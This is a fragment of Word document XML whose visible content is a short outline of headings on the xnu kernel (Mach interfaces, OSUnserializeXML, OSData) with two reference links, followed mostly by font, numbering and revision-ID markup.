          <w:t>https://flanker017.me/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B74CA7" w:rsidRPr="00B74CA7" w:rsidRDefault="00B74CA7" w:rsidP="00B74CA7"/>
    <w:p w:rsidR="002855AF" w:rsidRDefault="002855AF" w:rsidP="002855AF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>xnu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002855AF" w:rsidRPr="002855AF" w:rsidRDefault="002855AF" w:rsidP="002855AF"/>
    <w:p w:rsidR="002855AF" w:rsidRDefault="004106D2" w:rsidP="002855AF">
      <w:hyperlink r:id="rId132" w:history="1">
        <w:r w:rsidR="005C4950" w:rsidRPr="00650193">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://web.mit.edu/darwin/src/modules/xnu/osfmk/man/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005C4950" w:rsidRDefault="005C4950" w:rsidP="005C4950">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Simsun" w:hAnsi="Simsun" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Simsun" w:hAnsi="Simsun"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Mach IPC Interface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4950" w:rsidRDefault="005C4950" w:rsidP="002855AF"/>
    <w:p w:rsidR="005C4950" w:rsidRDefault="005C4950" w:rsidP="005C4950">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Simsun" w:hAnsi="Simsun" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Simsun" w:hAnsi="Simsun"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Mach Virtual Memory Interface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4950" w:rsidRDefault="005C4950" w:rsidP="002855AF"/>
    <w:p w:rsidR="005C4950" w:rsidRDefault="005C4950" w:rsidP="005C4950">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Simsun" w:hAnsi="Simsun" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Simsun" w:hAnsi="Simsun"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Process Management Interface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4950" w:rsidRDefault="005C4950" w:rsidP="002855AF"/>
    <w:p w:rsidR="005C4950" w:rsidRDefault="005C4950" w:rsidP="005C4950">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Simsun" w:hAnsi="Simsun" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Simsun" w:hAnsi="Simsun"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>System Management Interface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4950" w:rsidRDefault="005C4950" w:rsidP="002855AF"/>
    <w:p w:rsidR="006264FD" w:rsidRDefault="006264FD" w:rsidP="006264FD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Simsun" w:hAnsi="Simsun" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Simsun" w:hAnsi="Simsun"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Machine Specific Interface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006264FD" w:rsidRPr="005C4950" w:rsidRDefault="006264FD" w:rsidP="002855AF"/>
    <w:p w:rsidR="002E7B51" w:rsidRDefault="00F06AC5" w:rsidP="002E7B51">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>OSUnserializeXML</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B209CA" w:rsidRPr="00B209CA" w:rsidRDefault="00B209CA" w:rsidP="00B209CA">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OSUnserializeXML</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF5219" w:rsidRDefault="00AF5219" w:rsidP="00AF5219">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>OSData</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF5219" w:rsidRDefault="00AF5219" w:rsidP="00AF5219">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>OSData</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF5219" w:rsidRDefault="00AF5219" w:rsidP="00AF5219">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>OSData</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF5219" w:rsidRDefault="00AF5219" w:rsidP="00AF5219">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>OSData</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF5219" w:rsidRDefault="00AF5219" w:rsidP="00AF5219">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>OSData</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF5219" w:rsidRDefault="00AF5219" w:rsidP="00AF5219">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>OSData</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7B51" w:rsidRPr="00EB7257" w:rsidRDefault="002E7B51" w:rsidP="006B36DE"/>
    <w:sectPr w:rsidR="002E7B51" w:rsidRPr="00EB72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Nova-Bold">
    <w:altName w:val="宋体"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000001" w:usb1="080E0000" w:usb2="00000010" w:usb3="00000000" w:csb0="00040000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Menlo-Bold">
    <w:altName w:val="Times New Roman"/>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 w:name="Utopia-Regular">
    <w:altName w:val="宋体"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000001" w:usb1="080E0000" w:usb2="00000010" w:usb3="00000000" w:csb0="00040000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="MS Shell Dlg 2">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MTT10">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yriadSetPro-Thin">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Menl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949"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="60146D8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7255"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2DEAD444"/>
    <w:lvl w:ilvl="0" w:tplc="FF027EA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987E73"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A43AEBB8"/>
    <w:lvl w:ilvl="0" w:tplc="DD5A6F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17170"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6A8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849D8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="17C64536"/>
    <w:lvl w:ilvl="0" w:tplc="53E6334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683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5B04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37549C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EF7AD09A"/>
    <w:lvl w:ilvl="0" w:tplc="111C9BD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7D5DDE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFD2D39A"/>
    <w:lvl w:ilvl="0" w:tplc="D2D018C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0D424C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B0F67CA0"/>
    <w:lvl w:ilvl="0" w:tplc="5CAA7F8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254601"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="75827990"/>
    <w:lvl w:ilvl="0" w:tplc="64D4954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4175EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6A4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83C28"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F9CE143A"/>
    <w:lvl w:ilvl="0" w:tplc="1D907152">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR1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D276B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="877AB76C"/>
    <w:lvl w:ilvl="0" w:tplc="DF0A13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5B57555"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6AACA2E4"/>
    <w:lvl w:ilvl="0" w:tplc="91D6617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950977"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A83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61517"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="87462996"/>
    <w:lvl w:ilvl="0" w:tplc="2E1C7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71E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1A10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E26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B371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4376A2F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D8E66F16"/>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
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1512"/>
        </w:tabs>
        <w:ind w:left="1512" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2232"/>
        </w:tabs>
        <w:ind w:left="2232" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2952"/>
        </w:tabs>
        <w:ind w:left="2952" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3672"/>
        </w:tabs>
        <w:ind w:left="3672" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4392"/>
        </w:tabs>
        <w:ind w:left="4392" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5112"/>
        </w:tabs>
        <w:ind w:left="5112" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5832"/>
        </w:tabs>
        <w:ind w:left="5832" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6552"/>
        </w:tabs>
        <w:ind w:left="6552" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="658A34E2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1F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9013F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ED9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132B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="33B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B4FB1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFD2D39A"/>
    <w:lvl w:ilvl="0" w:tplc="D2D018C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7459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5"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="3"/>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F4"/>
    <w:rsid w:val="00002DBC"/>
    <w:rsid w:val="000173ED"/>
    <w:rsid w:val="0001799D"/>
    <w:rsid w:val="000227ED"/>
    <w:rsid w:val="00026826"/>
    <w:rsid w:val="00027FCB"/>
    <w:rsid w:val="0003193F"/>
    <w:rsid w:val="000349AA"/>
    <w:rsid w:val="0003626D"/>
    <w:rsid w:val="00036C30"/>
    <w:rsid w:val="00037480"/>
    <w:rsid w:val="00041038"/>
    <w:rsid w:val="0004552E"/>
    <w:rsid w:val="00045A43"/>
    <w:rsid w:val="00052155"/>
    <w:rsid w:val="00053E46"/>
    <w:rsid w:val="000569DB"/>
    <w:rsid w:val="00061FE2"/>
    <w:rsid w:val="00063842"/>
    <w:rsid w:val="00065E1C"/>
    <w:rsid w:val="00066C5C"/>
    <w:rsid w:val="000743A7"/>
    <w:rsid w:val="000861FA"/>
    <w:rsid w:val="0008705F"/>
    <w:rsid w:val="0009058C"/>
    <w:rsid w:val="00091AEE"/>
    <w:rsid w:val="00093FEF"/>
    <w:rsid w:val="000940DD"/>
    <w:rsid w:val="000A0651"/>
    <w:rsid w:val="000A21FB"/>
    <w:rsid w:val="000A4450"/>
    <w:rsid w:val="000A4AF5"/>
    <w:rsid w:val="000B2BB8"/>
    <w:rsid w:val="000B3EFA"/>
    <w:rsid w:val="000B445C"/>
    <w:rsid w:val="000C06B3"/>
    <w:rsid w:val="000C2CBA"/>
    <w:rsid w:val="000C3756"/>
    <w:rsid w:val="000D006B"/>
    <w:rsid w:val="000D0527"/>
    <w:rsid w:val="000D1316"/>
    <w:rsid w:val="000E15E5"/>
    <w:rsid w:val="000F5493"/>
    <w:rsid w:val="000F68F1"/>
    <w:rsid w:val="001011F4"/>
    <w:rsid w:val="0010480E"/>
    <w:rsid w:val="00104EAF"/>
    <w:rsid w:val="00105341"/>
    <w:rsid w:val="00105D1E"/>
    <w:rsid w:val="00107213"/>
    <w:rsid w:val="001220CC"/>
    <w:rsid w:val="0012391D"/>
    <w:rsid w:val="00124EA9"/>
    <w:rsid w:val="00127BDA"/>
    <w:rsid w:val="00130705"/>
    <w:rsid w:val="00132BFE"/>
    <w:rsid w:val="001373F2"/>
    <w:rsid w:val="00140DD0"/>
    <w:rsid w:val="0014464C"/>
    <w:rsid w:val="00147CE9"/>
    <w:rsid w:val="00153A72"/>
    <w:rsid w:val="00155225"/>
    <w:rsid w:val="00157867"/>
    <w:rsid w:val="00167026"/>
    <w:rsid w:val="00173587"/>
    <w:rsid w:val="00177C70"/>
    <w:rsid w:val="001800E2"/>
    <w:rsid w:val="00180F81"/>
    <w:rsid w:val="00184A22"/>
    <w:rsid w:val="001869D8"/>
    <w:rsid w:val="00186FB0"/>
    <w:rsid w:val="00195D36"/>
    <w:rsid w:val="001979D3"/>
    <w:rsid w:val="001A0C9E"/>
    <w:rsid w:val="001A1196"/>
    <w:rsid w:val="001A2185"/>
    <w:rsid w:val="001A2F54"/>
    <w:rsid w:val="001A3110"/>
    <w:rsid w:val="001B0C12"/>
    <w:rsid w:val="001B52D7"/>
    <w:rsid w:val="001C325E"/>
    <w:rsid w:val="001E0CE6"/>
    <w:rsid w:val="001E5CDB"/>
    <w:rsid w:val="001F00F2"/>
    <w:rsid w:val="001F294B"/>
    <w:rsid w:val="001F604F"/>
    <w:rsid w:val="001F74D8"/>
    <w:rsid w:val="00200C17"/>
    <w:rsid w:val="00205331"/>
    <w:rsid w:val="00214706"/>
    <w:rsid w:val="002151C5"/>
    <w:rsid w:val="0021622D"/>
    <w:rsid w:val="00220FEC"/>
    <w:rsid w:val="00224A2A"/>
    <w:rsid w:val="00224DD4"/>
    <w:rsid w:val="00226518"/>
    <w:rsid w:val="00233A7D"/>
    <w:rsid w:val="00236B14"/>
    <w:rsid w:val="00240294"/>
    <w:rsid w:val="00243038"/>
    <w:rsid w:val="002432E8"/>
    <w:rsid w:val="002448FE"/>
    <w:rsid w:val="0024660C"/>
    <w:rsid w:val="00250CE4"/>
    <w:rsid w:val="00254B45"/>
    <w:rsid w:val="002561F3"/>
    <w:rsid w:val="00256CA2"/>
    <w:rsid w:val="00260C10"/>
    <w:rsid w:val="00265C08"/>
    <w:rsid w:val="00266C65"/>
    <w:rsid w:val="0027225E"/>
    <w:rsid w:val="00274437"/>
    <w:rsid w:val="00275FEA"/>
    <w:rsid w:val="00283C75"/>
    <w:rsid w:val="002855AF"/>
    <w:rsid w:val="00287686"/>
    <w:rsid w:val="002A4198"/>
    <w:rsid w:val="002A566C"/>
    <w:rsid w:val="002B20FE"/>
    <w:rsid w:val="002C591F"/>
    <w:rsid w:val="002D5065"/>
    <w:rsid w:val="002E0904"/>
    <w:rsid w:val="002E27A6"/>
    <w:rsid w:val="002E2987"/>
    <w:rsid w:val="002E7A42"/>
    <w:rsid w:val="002E7B51"/>
    <w:rsid w:val="002F3CC9"/>
    <w:rsid w:val="002F720D"/>
    <w:rsid w:val="002F7782"/>
    <w:rsid w:val="00302E6C"/>
    <w:rsid w:val="00302E7E"/>
    <w:rsid w:val="00306D74"/>
    <w:rsid w:val="00307718"/>
    <w:rsid w:val="00312725"/>
    <w:rsid w:val="00314D7D"/>
    <w:rsid w:val="0032166C"/>
    <w:rsid w:val="00321BA4"/>
    <w:rsid w:val="0032204A"/>
    <w:rsid w:val="003249E6"/>
    <w:rsid w:val="0033335A"/>
    <w:rsid w:val="003337CC"/>
    <w:rsid w:val="00337115"/>
    <w:rsid w:val="00337661"/>
    <w:rsid w:val="003435D8"/>
    <w:rsid w:val="00345122"/>
    <w:rsid w:val="003462A1"/>
    <w:rsid w:val="003475D0"/>
    <w:rsid w:val="003506C3"/>
    <w:rsid w:val="003529D1"/>
    <w:rsid w:val="00352AD7"/>
    <w:rsid w:val="00353ADE"/>
    <w:rsid w:val="00354C57"/>
    <w:rsid w:val="00357899"/>
    <w:rsid w:val="00362D2C"/>
    <w:rsid w:val="00365129"/>
    <w:rsid w:val="00370205"/>
    <w:rsid w:val="003724A2"/>
    <w:rsid w:val="00381117"/>
    <w:rsid w:val="003817CE"/>
    <w:rsid w:val="003846C8"/>
    <w:rsid w:val="00391850"/>
    <w:rsid w:val="003A34D6"/>
    <w:rsid w:val="003A422D"/>
    <w:rsid w:val="003B0C1F"/>
    <w:rsid w:val="003B325C"/>
    <w:rsid w:val="003B5014"/>
    <w:rsid w:val="003B66CC"/>
    <w:rsid w:val="003C0777"/>
    <w:rsid w:val="003C4D4E"/>
    <w:rsid w:val="003C51F7"/>
    <w:rsid w:val="003C5B86"/>
    <w:rsid w:val="003C7262"/>
    <w:rsid w:val="003D0BBE"/>
    <w:rsid w:val="003D4234"/>
    <w:rsid w:val="003D7F69"/>
    <w:rsid w:val="003E2363"/>
    <w:rsid w:val="003E35B6"/>
    <w:rsid w:val="003F5EBF"/>
    <w:rsid w:val="003F6415"/>
    <w:rsid w:val="00402A99"/>
    <w:rsid w:val="00402B6D"/>
    <w:rsid w:val="00403D90"/>
    <w:rsid w:val="00406813"/>
    <w:rsid w:val="00410654"/>
    <w:rsid w:val="004106D2"/>
    <w:rsid w:val="004110B9"/>
    <w:rsid w:val="00420C4F"/>
    <w:rsid w:val="00425809"/>
    <w:rsid w:val="004317B7"/>
    <w:rsid w:val="00443915"/>
    <w:rsid w:val="00444C32"/>
    <w:rsid w:val="0044540C"/>
    <w:rsid w:val="0044636D"/>
    <w:rsid w:val="00464C53"/>
    <w:rsid w:val="004674CA"/>
    <w:rsid w:val="00467FD0"/>
    <w:rsid w:val="004706B5"/>
    <w:rsid w:val="00470AF4"/>
    <w:rsid w:val="00475314"/>
    <w:rsid w:val="00477827"/>
    <w:rsid w:val="0048575C"/>
    <w:rsid w:val="00487C51"/>
    <w:rsid w:val="004A2EAD"/>
    <w:rsid w:val="004A3AC6"/>
    <w:rsid w:val="004A4148"/>
    <w:rsid w:val="004B3761"/>
    <w:rsid w:val="004C0456"/>
    <w:rsid w:val="004C3A80"/>
    <w:rsid w:val="004C3FAF"/>
    <w:rsid w:val="004C5F68"/>
    <w:rsid w:val="004D296D"/>
    <w:rsid w:val="004D6690"/>
    <w:rsid w:val="004F185F"/>
    <w:rsid w:val="004F591F"/>
    <w:rsid w:val="00502F61"/>
    <w:rsid w:val="00503799"/>
    <w:rsid w:val="005038A2"/>
    <w:rsid w:val="005133F0"/>
    <w:rsid w:val="00514545"/>
    <w:rsid w:val="00521AEC"/>
    <w:rsid w:val="00530678"/>
    <w:rsid w:val="00534254"/>
    <w:rsid w:val="005366B4"/>
    <w:rsid w:val="00543C2C"/>
    <w:rsid w:val="005470E0"/>
    <w:rsid w:val="00552501"/>
    <w:rsid w:val="00554FBC"/>
    <w:rsid w:val="00561B8D"/>
    <w:rsid w:val="00566F79"/>
    <w:rsid w:val="005677C5"/>
    <w:rsid w:val="00570ACB"/>
    <w:rsid w:val="005719F6"/>
    <w:rsid w:val="00573749"/>
    <w:rsid w:val="00576E0B"/>
    <w:rsid w:val="00577B14"/>
    <w:rsid w:val="00582644"/>
    <w:rsid w:val="00582D85"/>
    <w:rsid w:val="00583600"/>
    <w:rsid w:val="0058734B"/>
    <w:rsid w:val="005A01E4"/>
    <w:rsid w:val="005A2F75"/>
    <w:rsid w:val="005A3096"/>
    <w:rsid w:val="005A53D7"/>
    <w:rsid w:val="005B09C4"/>
    <w:rsid w:val="005B48FC"/>
    <w:rsid w:val="005B5CFA"/>
    <w:rsid w:val="005C4950"/>
    <w:rsid w:val="005C50F6"/>
    <w:rsid w:val="005C662A"/>
    <w:rsid w:val="005D09B1"/>
    <w:rsid w:val="005D1D0B"/>
    <w:rsid w:val="005D25CD"/>
    <w:rsid w:val="005D29AE"/>
    <w:rsid w:val="005D5164"/>
    <w:rsid w:val="005E26BD"/>
    <w:rsid w:val="005E36D3"/>
    <w:rsid w:val="005E5551"/>
    <w:rsid w:val="005E65B7"/>
    <w:rsid w:val="005E79ED"/>
    <w:rsid w:val="005E7BD5"/>
    <w:rsid w:val="005F1222"/>
    <w:rsid w:val="005F726B"/>
    <w:rsid w:val="005F7699"/>
    <w:rsid w:val="00604427"/>
    <w:rsid w:val="00605F01"/>
    <w:rsid w:val="006100CF"/>
    <w:rsid w:val="006153FA"/>
    <w:rsid w:val="006226C8"/>
    <w:rsid w:val="006227A2"/>
    <w:rsid w:val="0062359A"/>
    <w:rsid w:val="006264FD"/>
    <w:rsid w:val="0063031C"/>
    <w:rsid w:val="006347F7"/>
    <w:rsid w:val="00642498"/>
    <w:rsid w:val="00642C59"/>
    <w:rsid w:val="00646EEA"/>
    <w:rsid w:val="00652EA3"/>
    <w:rsid w:val="0065494F"/>
    <w:rsid w:val="006549A1"/>
    <w:rsid w:val="00655847"/>
    <w:rsid w:val="00660132"/>
    <w:rsid w:val="0067185B"/>
    <w:rsid w:val="006726F1"/>
    <w:rsid w:val="00672CEC"/>
    <w:rsid w:val="00673227"/>
    <w:rsid w:val="0067383D"/>
    <w:rsid w:val="00676B55"/>
    <w:rsid w:val="00677E6F"/>
    <w:rsid w:val="006865D3"/>
    <w:rsid w:val="00690E93"/>
    <w:rsid w:val="00693D66"/>
    <w:rsid w:val="006956E7"/>
    <w:rsid w:val="0069634B"/>
    <w:rsid w:val="006A177D"/>
    <w:rsid w:val="006A53ED"/>
    <w:rsid w:val="006B0AB1"/>
    <w:rsid w:val="006B36DE"/>
    <w:rsid w:val="006B4005"/>
    <w:rsid w:val="006B5DF4"/>
    <w:rsid w:val="006B61E0"/>
    <w:rsid w:val="006C0B30"/>
    <w:rsid w:val="006C6DB7"/>
    <w:rsid w:val="006C715A"/>
    <w:rsid w:val="006C7934"/>
    <w:rsid w:val="006D0E0F"/>
    <w:rsid w:val="006D3FB6"/>
    <w:rsid w:val="006D6AC3"/>
    <w:rsid w:val="006E41F8"/>
    <w:rsid w:val="006E5423"/>
    <w:rsid w:val="006F2716"/>
    <w:rsid w:val="006F7195"/>
    <w:rsid w:val="00701648"/>
    <w:rsid w:val="007030CF"/>
    <w:rsid w:val="00707708"/>
    <w:rsid w:val="00710FD5"/>
    <w:rsid w:val="0071132D"/>
    <w:rsid w:val="00716C7F"/>
    <w:rsid w:val="007204E1"/>
    <w:rsid w:val="00721439"/>
    <w:rsid w:val="0072238E"/>
    <w:rsid w:val="007279AA"/>
    <w:rsid w:val="007326D4"/>
    <w:rsid w:val="00735163"/>
    <w:rsid w:val="007368EC"/>
    <w:rsid w:val="007404F3"/>
    <w:rsid w:val="00741781"/>
    <w:rsid w:val="00743BEE"/>
    <w:rsid w:val="00745DA3"/>
    <w:rsid w:val="007467D0"/>
    <w:rsid w:val="00752581"/>
    <w:rsid w:val="00754C85"/>
    <w:rsid w:val="00757213"/>
    <w:rsid w:val="00760310"/>
    <w:rsid w:val="0076052F"/>
